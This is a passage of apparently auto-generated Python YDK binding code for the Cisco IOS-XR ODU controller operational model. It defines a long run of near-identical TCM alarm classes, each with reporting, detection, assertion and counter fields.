self.yang_name = "tcm1-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Biae']['meta_info']
class Tcm1Bdi(_Entity_):
"""
TCM1 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi, self).__init__()
self.yang_name = "tcm1-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi']['meta_info']
class Tcm1Tim(_Entity_):
"""
TCM1 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Tim, self).__init__()
self.yang_name = "tcm1-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Tim']['meta_info']
class Tcm1SfBer(_Entity_):
"""
TCM1 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer, self).__init__()
self.yang_name = "tcm1-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer']['meta_info']
class Tcm1SdBer(_Entity_):
"""
TCM1 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer, self).__init__()
self.yang_name = "tcm1-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer']['meta_info']
class Tcm2Ais(_Entity_):
"""
TCM2 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Ais, self).__init__()
self.yang_name = "tcm2-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Ais']['meta_info']
class Tcm2Ltc(_Entity_):
"""
TCM2 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc, self).__init__()
self.yang_name = "tcm2-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc']['meta_info']
class Tcm2Oci(_Entity_):
"""
TCM2 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Oci, self).__init__()
self.yang_name = "tcm2-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Oci']['meta_info']
class Tcm2Lck(_Entity_):
"""
TCM2 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Lck, self).__init__()
self.yang_name = "tcm2-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Lck']['meta_info']
class Tcm2Iae(_Entity_):
"""
TCM2 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Iae, self).__init__()
self.yang_name = "tcm2-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Iae']['meta_info']
class Tcm2Biae(_Entity_):
"""
TCM2 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Biae, self).__init__()
self.yang_name = "tcm2-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Biae']['meta_info']
class Tcm2Bdi(_Entity_):
"""
TCM2 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi, self).__init__()
self.yang_name = "tcm2-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi']['meta_info']
class Tcm2Tim(_Entity_):
"""
TCM2 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2Tim, self).__init__()
self.yang_name = "tcm2-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2Tim']['meta_info']
class Tcm2SfBer(_Entity_):
"""
TCM2 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer, self).__init__()
self.yang_name = "tcm2-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer']['meta_info']
class Tcm2SdBer(_Entity_):
"""
TCM2 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer, self).__init__()
self.yang_name = "tcm2-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm2-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer']['meta_info']
class Tcm3Ais(_Entity_):
"""
TCM3 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Ais, self).__init__()
self.yang_name = "tcm3-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Ais']['meta_info']
class Tcm3Ltc(_Entity_):
"""
TCM3 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc, self).__init__()
self.yang_name = "tcm3-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc']['meta_info']
class Tcm3Oci(_Entity_):
"""
TCM3 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Oci, self).__init__()
self.yang_name = "tcm3-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Oci']['meta_info']
class Tcm3Lck(_Entity_):
"""
TCM3 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Lck, self).__init__()
self.yang_name = "tcm3-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-lck"
self._is_frozen = True
def __setattr__(self, name, value):
